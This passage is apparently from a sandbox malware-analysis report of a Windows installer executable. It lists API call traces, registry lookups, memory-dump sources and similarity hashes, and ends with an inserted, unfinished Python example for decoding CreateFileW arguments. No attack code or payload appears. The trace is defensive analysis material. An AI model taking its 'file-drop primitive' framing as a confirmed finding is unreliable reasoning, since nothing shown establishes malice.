  • Part of subcall function 0043F694: lstrcatW.KERNEL32(?,?), ref: 0043F6DD
• lstrcatW.KERNEL32(?,.ini), ref: 00440103
• lstrcpyW.KERNEL32 ref: 00440112
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: lstrcpy$lstrcat$CharNext_wcsrchrlstrcpynlstrlenwsprintf
• String ID: %#04x$.ini
• API String ID: 3831616985-866680231
• Opcode ID: e948ff50f732aa0e6b05b0197cc8289fd38350952c1fd68609128b6a1574d291
• Instruction ID: 9c9a483e69db4c729a90b923d3f4109f2775f79c1bad490d6a180dfaf7d5776b
                                                                                                                                                                          • Opcode Fuzzy Hash: e948ff50f732aa0e6b05b0197cc8289fd38350952c1fd68609128b6a1574d291
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A014F71900218BBDB00EFA5DC46DEF77BCEF49714B008066F809A2141DB38EA058BA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041F53A
                                                                                                                                                                          • __ltow_s.LIBCMT ref: 0041F572
                                                                                                                                                                          • SetLastError.KERNEL32(00000008,00000000,00000000,?,?,?,00000000,?,?,00000001), ref: 0041F5A1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last__ltow_s
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2344196725-815662401
                                                                                                                                                                          • Opcode ID: c96ca283a4f670909ebf739ba84eae7fa5ee4cd402d2de1e0138b96ece8d58ae
                                                                                                                                                                          • Instruction ID: c31c904021e132e1002971dd78a2b18e37e079d68fe1251bf6cccadc293eb156
                                                                                                                                                                          • Opcode Fuzzy Hash: c96ca283a4f670909ebf739ba84eae7fa5ee4cd402d2de1e0138b96ece8d58ae
                                                                                                                                                                          • Instruction Fuzzy Hash: C401D271800208EBDB20EF90C945DDE7BB5FB44314F54452EF504A7291DB759A45CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00431988
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00431998
                                                                                                                                                                            • Part of subcall function 004320F1: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00431978,?,?), ref: 00432103
                                                                                                                                                                            • Part of subcall function 004320F1: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00432113
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: Advapi32.dll$RegDeleteKeyExW
                                                                                                                                                                          • API String ID: 1646373207-2191092095
                                                                                                                                                                          • Opcode ID: 326cd7fce92b8924169d81be504bbcb9f55db01732045abf26c2d7b7d83cd487
                                                                                                                                                                          • Instruction ID: dd37f9d3439fbcbe3bf38b2a549841ccfa3b53978471e8722b2116d3f20d5271
                                                                                                                                                                          • Opcode Fuzzy Hash: 326cd7fce92b8924169d81be504bbcb9f55db01732045abf26c2d7b7d83cd487
                                                                                                                                                                          • Instruction Fuzzy Hash: 5A01DF74108200FBDB104F50DC24B65BFA2BF1D351F1090ABF44A91271EB669A44DB2D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004739F3
                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 00473A0F
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00473A42
                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00473A72
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeLastString
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3822639702-1835203436
                                                                                                                                                                          • Opcode ID: 283aa6313a280586939511c29e89319b6e0852ad2fbfbbddf52d478e48815072
                                                                                                                                                                          • Instruction ID: 150f6e05978fa2c8ef4af202aa7dc708589bf23497ff85e664190e12c7eada26
                                                                                                                                                                          • Opcode Fuzzy Hash: 283aa6313a280586939511c29e89319b6e0852ad2fbfbbddf52d478e48815072
                                                                                                                                                                          • Instruction Fuzzy Hash: A801E2384041049BDB00AF64ED09B993BA5EF29309B8540FBE809E3272D73B695CCF8C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\InstallShield\ISWI\7.0\SetupExeLog,00000000,00000001,?), ref: 0041C5D7
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,SetupLogFileName,00000000,00000000,0049F668,?), ref: 0041C5FD
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041C618
                                                                                                                                                                          Strings
                                                                                                                                                                          • Software\InstallShield\ISWI\7.0\SetupExeLog, xrefs: 0041C5CD
                                                                                                                                                                          • SetupLogFileName, xrefs: 0041C5EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID: SetupLogFileName$Software\InstallShield\ISWI\7.0\SetupExeLog
                                                                                                                                                                          • API String ID: 3677997916-622478307
                                                                                                                                                                          • Opcode ID: 8039b13624f15f90f3e6bb2e7f2f18806f24899ce577f0137cd97e99211e9298
                                                                                                                                                                          • Instruction ID: 1ec7e8d73d53d4762f271f3a6044bfe54086d2b13b2f9b9fb6d24fbfc8a2aa94
                                                                                                                                                                          • Opcode Fuzzy Hash: 8039b13624f15f90f3e6bb2e7f2f18806f24899ce577f0137cd97e99211e9298
                                                                                                                                                                          • Instruction Fuzzy Hash: CDF089B1240344BBEB20DB51DC4AFDE7EBDDB95B01F104075B605E11A0D6B45A49DA2D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0043903D
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,0043ABFF,00000000,00000000,00000001), ref: 00439065
                                                                                                                                                                          • SetLastError.KERNEL32(00000008), ref: 00439098
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG$hsG
• API String ID: 3502553090-148063137
• Opcode ID: 3896c554a1ee2f42b031abd0cb24c383073f6c7d9b80603c6e8ea63fd4ddf833
• Instruction ID: 6af8fd99a4e1ceff93cfd34ef824ee1732dedf47875737897cbbcf0007d128f7
• Opcode Fuzzy Hash: 3896c554a1ee2f42b031abd0cb24c383073f6c7d9b80603c6e8ea63fd4ddf833
• Instruction Fuzzy Hash: 82019E30404646EFCB01DF54C948B9CBBB1BF00318F14C15EE8185B392C7B9AA54DB44
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00415410
• GetLastError.KERNEL32(00000004,00415597,?,00000000,00000004,004166A4,?,00000001), ref: 00415438
• SetLastError.KERNEL32(?,?), ref: 00415468
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG$hsG
• API String ID: 3502553090-148063137
• Opcode ID: 25ab85ae9e261cb90a25950f3880020dc9ce1899dbcf4e984f3cf15409ca0484
• Instruction ID: 65d6d302b739bc02b84f888956bbc4a812ecd6803861786213f9fddf34d32e0a
• Opcode Fuzzy Hash: 25ab85ae9e261cb90a25950f3880020dc9ce1899dbcf4e984f3cf15409ca0484
• Instruction Fuzzy Hash: 8201BC30400645EFC710EF55C908BDCBBB1BF00318F14C25EE8185B3A2C7B8AA94DB88
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0041548D
• GetLastError.KERNEL32(?,?,?,00000004), ref: 004154B5
• SetLastError.KERNEL32(?,?,?,?,?,00000004), ref: 004154E5
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG$hsG
• API String ID: 3502553090-148063137
• Opcode ID: e8c102dbb9ac6f906824622144e097b398254eb03e7ebb7e450a51fd1c177a48
• Instruction ID: 3d9c79b3ff7dddcb8e9ac08f56a7f312ffb827751539f2896737dc429557cb3e
• Opcode Fuzzy Hash: e8c102dbb9ac6f906824622144e097b398254eb03e7ebb7e450a51fd1c177a48
• Instruction Fuzzy Hash: 4801BC30400645EFD700EF55C548BDCBBB1BF00318F14C25EE8185B3A2CBB8AA84DB88
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CharNext
• String ID: /m1$/m2
• API String ID: 3213498283-2289526375
• Opcode ID: d2e7ebf19c4c3980dcf54e5d90e0c280d8c1be2b096c0c8047adc858205bac6f
• Instruction ID: ad0e97c87b4642bb15936ebbb4cc2382faf8d11e6453767fa7e6f77b0ba24e30
• Opcode Fuzzy Hash: d2e7ebf19c4c3980dcf54e5d90e0c280d8c1be2b096c0c8047adc858205bac6f
• Instruction Fuzzy Hash: B6E02B306DC114B9A6246F288CE58FE3918FA413547A002BB7407A25E1CB5C0EC2EFEF
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 004390BD
• GetLastError.KERNEL32(00000004,0043B7AC,00000001,removeasmajorupgrade,00000000,00000000,00000001,?), ref: 004390E5
• SetLastError.KERNEL32(00000008), ref: 0043910E
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG$hsG
• API String ID: 3502553090-148063137
• Opcode ID: 57653936656da7cfbb61492fa6fba3c11f7a0209075d143165ab34e93bbacb31
• Instruction ID: 48ace98de89235db829c715544e479cedbebb5dda87c505fae8b47019672f4d2
• Opcode Fuzzy Hash: 57653936656da7cfbb61492fa6fba3c11f7a0209075d143165ab34e93bbacb31
• Instruction Fuzzy Hash: 69018B70504645EFD700DF54C54879CBBF1BF00319F55C2AEE8085B392C7B9AA84DB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00415D67
• GetLastError.KERNEL32(00000004,00416264,00000000,00000004,00415E33,00000001,00000004,80070057), ref: 00415D8F
• SetLastError.KERNEL32(?), ref: 00415DB8
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG$hsG
• API String ID: 3502553090-148063137
• Opcode ID: 8f3f3ce73e10cb00ed0fc433b4de4d0451186682566f0ccc6f48e49c2e2f1b46
• Instruction ID: fdc90de00d6c2517474ca1f187016c383736ae76038672babb381d6b48f87e7e
• Opcode Fuzzy Hash: 8f3f3ce73e10cb00ed0fc433b4de4d0451186682566f0ccc6f48e49c2e2f1b46
• Instruction Fuzzy Hash: 60018B70504641EFD700DF54C50879CBBF1BF00319F55C26EE8085B392C7B9AA84DB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C), ref: 00459510
• GetProcAddress.KERNEL32(00000000), ref: 00459517
• GetCurrentProcess.KERNEL32(00000000,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C,0000000C,?), ref: 00459527
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                          • String ID: IsWow64Process$kernel32
                                                                                                                                                                          • API String ID: 4190356694-3789238822
                                                                                                                                                                          • Opcode ID: fcaea0cb5ea390e2957779cc6c4388bc8b99ab2736cec8f0383d29537c3ff7ae
                                                                                                                                                                          • Instruction ID: 286db41402bd5a718e77a505517fe7b9e08087b13d73ed085d08d002144ea244
                                                                                                                                                                          • Opcode Fuzzy Hash: fcaea0cb5ea390e2957779cc6c4388bc8b99ab2736cec8f0383d29537c3ff7ae
                                                                                                                                                                          • Instruction Fuzzy Hash: 17E04871C11619FBCB10ABF49D0DA4F7BACDB04B52F510865B405E3141E678CA448758
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0043567B: __EH_prolog3_GS.LIBCMT ref: 00435685
                                                                                                                                                                          • lstrcmpiW.KERNEL32(-00000004,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,PackageCode,?), ref: 0042301B
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                            • Part of subcall function 0041FAB3: __EH_prolog3.LIBCMT ref: 0041FABA
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$ErrorH_prolog3Last$lstrcmpi
                                                                                                                                                                          • String ID: F$HsG$InstallSource$PackageName
                                                                                                                                                                          • API String ID: 4151595970-4212326990
                                                                                                                                                                          • Opcode ID: cc0386ea5e6e1c9fa51aff9789436b237a985c8e7136f4fcd0164ab30dd77d2d
                                                                                                                                                                          • Instruction ID: 053585f03e5055840f7453a2bac45b095e3aff88066a652b81a0ff9d18a8dc04
                                                                                                                                                                          • Opcode Fuzzy Hash: cc0386ea5e6e1c9fa51aff9789436b237a985c8e7136f4fcd0164ab30dd77d2d
                                                                                                                                                                          • Instruction Fuzzy Hash: D2817E71A02268DEDB11DB64CD55BDEB7B4AB16308F0040EEE00977292DB785F88CF5A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,000000FF), ref: 0040668C
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406736
                                                                                                                                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 00406763
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$BuffersCreateFlushWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2392883816-0
                                                                                                                                                                          • Opcode ID: 8874beeada4571a0e28cfdf73eeba0568ed48687cb183ea68499c68783dd4349
                                                                                                                                                                          • Instruction ID: 62f5debe0e3e7ffa9552caaea30d86197b0b1ee403166d45280894390b5a4988
                                                                                                                                                                          • Opcode Fuzzy Hash: 8874beeada4571a0e28cfdf73eeba0568ed48687cb183ea68499c68783dd4349
                                                                                                                                                                          • Instruction Fuzzy Hash: D0517E715087009FD720DF28C844B5BB7E9BB84728F014A3EF59AA72D0DB78D958CB5A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
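The CreateFileW / WriteFile / FlushFileBuffers sequence in the function above is the sample's file-write primitive, but the report prints its arguments as raw hex, so the access mode and creation disposition have to be decoded against the Win32 constants before the behaviour is readable. The following is an added Python example, not part of the Joe Sandbox report and not code recovered from the sample: it parses API lines written in the report's own "API.MODULE(args), ref: addr" notation and decodes the CreateFileW call. The three input lines are copied from the block above; the constant tables are the standard Win32 values; the `is_file_drop` heuristic is an assumption of this example, not a field the report computes.

```python
"""Decode API-call lines from a Joe Sandbox style function listing.

Added example for the report above; it is neither the sandbox's code nor the
sample's. It parses lines written in the report's own notation, e.g.
    • CreateFileW.KERNEL32(?,40000000,00000003,...), ref: 0040668C
and decodes CreateFileW's arguments with the standard Win32 constants, so a
file-drop primitive can be read off the listing without a flag table at hand.
"""
import re
from dataclasses import dataclass
from typing import List, Union

# Constructed input: the three API lines of the CreateFileW block, copied from the report.
REPORT_LINES = [
    "• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,000000FF), ref: 0040668C",
    "• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406736",
    "• FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 00406763",
]

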